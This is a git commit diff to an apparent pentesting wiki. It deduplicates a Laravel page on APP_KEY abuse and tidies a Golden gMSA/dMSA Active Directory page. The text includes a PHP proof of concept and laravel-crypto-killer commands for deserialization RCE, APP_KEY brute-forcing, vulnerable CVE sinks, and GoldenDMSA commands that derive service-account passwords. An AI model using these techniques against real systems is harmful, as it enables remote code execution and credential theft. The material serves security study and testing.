f

2025-10-10 18:36:50 +00:00 · 2025-07-28 12:56:40 +02:00 · 2025-07-28 12:56:40 +02:00 · 71b9eb4ca7
commit 71b9eb4ca7
parent 5887ddc8d8
2 changed files with 6 additions and 102 deletions
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@ -83,16 +83,6 @@ Key findings of the research published by Synacktiv (2024-2025):
 The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
 ---
 ## References
 * [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
 * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
 * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
 * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
 ## Laravel Tricks
@ -187,93 +177,7 @@ Or you can also exploit it with metasploit: `use unix/http/laravel_token_unseria
 Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
 ### Laravel SQLInjection
 Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 ### Laravel SQLInjection
 Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 ---
 ## APP_KEY & Encryption internals (Laravel \u003e=5.6)
 Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).
 The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:
 ```json
 {
  "iv"   : "Base64(random 16-byte IV)",
  "value": "Base64(ciphertext)",
  "mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
  "tag"  : ""                 // only used for AEAD ciphers (GCM)
 }
 ```
 `encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas
 `decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.
 Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**.
 Minimal PoC (framework ≥9.x):
 ```php
 use Illuminate\Support\Facades\Crypt;
 $chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
 $evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
 ```
 Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …).
 ---
 ## laravel-crypto-killer 🧨
 [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:
 ```bash
 # Encrypt a phpggc chain with a known APP_KEY
 laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
 # Decrypt a captured cookie / token
 laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
 # Try a word-list of keys against a token (offline)
 laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
 ```
 The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.
 ---
 ## Real-world vulnerable patterns
 | Project | Vulnerable sink | Gadget chain |
 |---------|-----------------|--------------|
 | Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
 | Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
 | Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
 The exploitation workflow is always:
 1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
 2. Generate gadget with **PHPGGC**
 3. `laravel_crypto_killer.py encrypt …`
 4. Deliver payload through the vulnerable parameter/cookie → **RCE**
 ---
 ## Mass APP_KEY discovery via cookie brute-force
 Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.
 Key findings of the research published by Synacktiv (2024-2025):
 * Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
 * Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
 * >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
 * Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
 The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
 ---
 ## References
 * [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
--- a/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
+++ b/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
@ -10,7 +10,7 @@ There are two major flavours:
 1. **gMSA** – group Managed Service Account – can be used on multiple hosts that are authorised in its `msDS-GroupMSAMembership` attribute.
 2. **dMSA** – delegated Managed Service Account – the (preview) successor to gMSA, relying on the same cryptography but allowing more granular delegation scenarios.
-For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash.  Instead every DC can **derive** the current password on-the-fly from:
+For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from:
 * The forest-wide **KDS Root Key** (`KRBTGT\KDS`)  – randomly generated GUID-named secret, replicated to every DC under the `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …` container.
 * The target account **SID**.
@ -35,7 +35,7 @@ This is analogous to a *Golden Ticket* for service accounts.
 3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code.
 ### Golden gMSA / dMSA
-##### Phase 1 – Extract the KDS Root Key
+#### Phase 1 – Extract the KDS Root Key
 Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets):
@ -60,7 +60,7 @@ The base64 string labelled `RootKey` (GUID name) is required in later steps.
 Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
-```powershell
+```bash
 # Authenticated or anonymous depending on ACLs
 Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
  Select sAMAccountName,objectSid,msDS-ManagedPasswordId
@ -70,7 +70,7 @@ GoldenGMSA.exe gmsainfo
 [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes:
-```powershell
+```bash
 # LDAP enumeration (kerberos / simple bind)
 GoldendMSA.exe info -d example.local -m ldap
@ -88,7 +88,7 @@ Because the GUID is 128-bit, naive bruteforce is infeasible, but:
 Therefore a **narrow wordlist per account** (± few hours) is realistic.
-```powershell
+```bash
 GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>
 ```
 The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute – the match reveals the correct GUID.
@ -97,7 +97,7 @@ The tool computes candidate passwords and compares their base64 blob against the
 Once the ManagedPasswordID is known, the valid password is one command away:
-```powershell
+```bash
 # derive base64 password
 GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKey ID>
 GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>